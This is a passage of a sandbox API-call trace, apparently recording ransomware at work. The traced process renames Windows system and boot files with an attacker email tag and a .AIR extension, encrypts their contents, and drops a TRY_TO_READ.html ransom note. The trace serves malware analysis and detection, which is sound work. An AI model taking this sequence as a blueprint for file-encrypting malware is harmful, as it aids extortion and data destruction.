	[0051.814] CreateFileW (lpFileName="C:\\\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\pagefile.sys.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.815] GetProcessHeap () returned 0x540000
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.815] CloseHandle (hObject=0xffffffff) returned 0
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a5a88
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.815] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a5a88 | out: pbBuffer=0x5a5a88) returned 1
	[0051.815] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596540 | out: pbBuffer=0x596540) returned 1
	[0051.815] SetFileAttributesW (lpFileName="C:\\\\hiberfil.sys", dwFileAttributes=0x80) returned 0
	[0051.815] lstrlenW (lpString="C:\\\\hiberfil.sys") returned 16
	[0051.815] GetProcessHeap () returned 0x540000
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x86) returned 0x5832a8
	[0051.815] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\hiberfil.sys" | out: lpString1="C:\\\\hiberfil.sys") returned="C:\\\\hiberfil.sys"
	[0051.815] lstrcatW (in: lpString1="C:\\\\hiberfil.sys", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.815] MoveFileExW (lpExistingFileName="C:\\\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.815] CreateFileW (lpFileName="C:\\\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\hiberfil.sys.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.815] GetProcessHeap () returned 0x540000
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.815] CloseHandle (hObject=0xffffffff) returned 0
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.815] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a5b90
	[0051.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596490
	[0051.815] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a5b90 | out: pbBuffer=0x5a5b90) returned 1
	[0051.815] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596490 | out: pbBuffer=0x596490) returned 1
	[0051.815] SetFileAttributesW (lpFileName="C:\\\\BOOTSECT.BAK", dwFileAttributes=0x80) returned 1
	[0051.816] lstrlenW (lpString="C:\\\\BOOTSECT.BAK") returned 16
	[0051.816] GetProcessHeap () returned 0x540000
	[0051.816] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x86) returned 0x5832a8
	[0051.817] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\BOOTSECT.BAK" | out: lpString1="C:\\\\BOOTSECT.BAK") returned="C:\\\\BOOTSECT.BAK"
	[0051.817] lstrcatW (in: lpString1="C:\\\\BOOTSECT.BAK", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.817] MoveFileExW (lpExistingFileName="C:\\\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootsect.bak.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.820] CreateFileW (lpFileName="C:\\\\BOOTSECT.BAK.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootsect.bak.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc
	[0051.820] GetProcessHeap () returned 0x540000
	[0051.820] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0051.820] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8192) returned 1
	[0051.820] SetFilePointer (in: hFile=0x3bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2000
	[0051.820] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0051.821] GetProcessHeap () returned 0x540000
	[0051.821] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5a5c98
	[0051.821] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5a5c98*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5a5c98*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0051.822] WriteFile (in: hFile=0x3bc, lpBuffer=0x5a5c98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a5c98*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0051.823] WriteFile (in: hFile=0x3bc, lpBuffer=0x596490*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596490*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0051.823] WriteFile (in: hFile=0x3bc, lpBuffer=0x596490*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596490*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0051.823] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2000) returned 0x5a5da0
	[0051.823] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2000) returned 0x5a7da8
	[0051.823] SetFilePointer (in: hFile=0x3bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.823] ReadFile (in: hFile=0x3bc, lpBuffer=0x5a5da0, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a5da0*, lpNumberOfBytesRead=0x3a1f778*=0x2000, lpOverlapped=0x0) returned 1
	[0051.824] SetFilePointer (in: hFile=0x3bc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0051.824] WriteFile (in: hFile=0x3bc, lpBuffer=0x5a7da8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5a7da8*, lpNumberOfBytesWritten=0x3a1f778*=0x2000, lpOverlapped=0x0) returned 1
	[0051.824] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5da0 | out: hHeap=0x540000) returned 1
	[0051.824] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a7da8 | out: hHeap=0x540000) returned 1
	[0051.824] CloseHandle (hObject=0x3bc) returned 1
	[0051.825] GetProcessHeap () returned 0x540000
	[0051.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5c98 | out: hHeap=0x540000) returned 1
	[0051.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5b90 | out: hHeap=0x540000) returned 1
	[0051.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596490 | out: hHeap=0x540000) returned 1
	[0051.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0051.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a51e8
	[0051.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5a5b90
	[0051.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596490
	[0051.825] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5a5b90 | out: pbBuffer=0x5a5b90) returned 1
	[0051.825] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596490 | out: pbBuffer=0x596490) returned 1
	[0051.825] SetFileAttributesW (lpFileName="C:\\\\bootmgr", dwFileAttributes=0x80) returned 0
	[0051.826] lstrlenW (lpString="C:\\\\bootmgr") returned 11
	[0051.826] GetProcessHeap () returned 0x540000
	[0051.826] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7c) returned 0x588cd8
	[0051.826] lstrcpyW (in: lpString1=0x588cd8, lpString2="C:\\\\bootmgr" | out: lpString1="C:\\\\bootmgr") returned="C:\\\\bootmgr"
	[0051.826] lstrcatW (in: lpString1="C:\\\\bootmgr", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.826] MoveFileExW (lpExistingFileName="C:\\\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootmgr.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0051.828] CreateFileW (lpFileName="C:\\\\bootmgr.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\bootmgr.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.828] GetProcessHeap () returned 0x540000
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.828] CloseHandle (hObject=0xffffffff) returned 0
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a51e8 | out: hHeap=0x540000) returned 1
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596dc8 | out: hHeap=0x540000) returned 1
	[0051.828] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.828] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d78 | out: hHeap=0x540000) returned 1
	[0051.828] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.Bin\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x574da0
	[0051.828] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.828] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d78
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574de0
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574de0 | out: hHeap=0x540000) returned 1
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d78 | out: hHeap=0x540000) returned 1
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.829] FindNextFileW (in: hFindFile=0x574da0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] GetLastError () returned 0x6
	[0051.829] SetLastError (dwErrCode=0x6) 
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d78
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574de0
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574de0 | out: hHeap=0x540000) returned 1
	[0051.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.829] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d78 | out: hHeap=0x540000) returned 1
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.830] FindNextFileW (in: hFindFile=0x574da0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.830] GetLastError () returned 0x6
	[0051.830] SetLastError (dwErrCode=0x6) 
	[0051.830] GetLastError () returned 0x6
	[0051.830] SetLastError (dwErrCode=0x6) 
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.830] GetLastError () returned 0x6
	[0051.830] SetLastError (dwErrCode=0x6) 
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x579c70
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579c70 | out: hHeap=0x540000) returned 1
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d78
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596560
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596570
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588e70
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.830] GetLastError () returned 0x6
	[0051.830] SetLastError (dwErrCode=0x6) 
	[0051.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0051.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588e70 | out: hHeap=0x540000) returned 1
	[0051.831] GetLastError () returned 0x6
	[0051.831] SetLastError (dwErrCode=0x6) 
	[0051.831] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598c88
	[0051.831] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\TRY_TO_READ.html" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c0
	[0051.831] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0051.831] WriteFile (in: hFile=0x3c0, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0051.832] WriteFile (in: hFile=0x3c0, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0051.832] WriteFile (in: hFile=0x3c0, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0051.832] CloseHandle (hObject=0x3c0) returned 1
	[0051.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596570 | out: hHeap=0x540000) returned 1
	[0051.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596560 | out: hHeap=0x540000) returned 1
	[0051.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588de8 | out: hHeap=0x540000) returned 1
	[0051.832] FindNextFileW (in: hFindFile=0x574da0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.832] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.832] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.832] GetLastError () returned 0x0
	[0051.833] SetLastError (dwErrCode=0x0) 
	[0051.833] GetLastError () returned 0x0
	[0051.833] SetLastError (dwErrCode=0x0) 
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588cd8
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.833] GetLastError () returned 0x0
	[0051.833] SetLastError (dwErrCode=0x0) 
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583918
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0051.833] FindNextFileW (in: hFindFile=0x574da0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9bcbdb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596dc8
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596da0 | out: hHeap=0x540000) returned 1
	[0051.833] FindFirstFileW (in: lpFileName="C:\\\\Boot\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x574de0
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588cd8 | out: hHeap=0x540000) returned 1
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.833] GetLastError () returned 0x12
	[0051.833] SetLastError (dwErrCode=0x12) 
	[0051.833] GetLastError () returned 0x12
	[0051.833] SetLastError (dwErrCode=0x12) 
	[0051.833] GetLastError () returned 0x12
	[0051.833] SetLastError (dwErrCode=0x12) 
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0051.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b730
	[0051.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b730 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596da0
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x574e20
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574e20 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596da0 | out: hHeap=0x540000) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5839c0 | out: hHeap=0x540000) returned 1
	[0051.834] FindNextFileW (in: hFindFile=0x574de0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9bcbdb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9bcbdb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.834] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.834] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
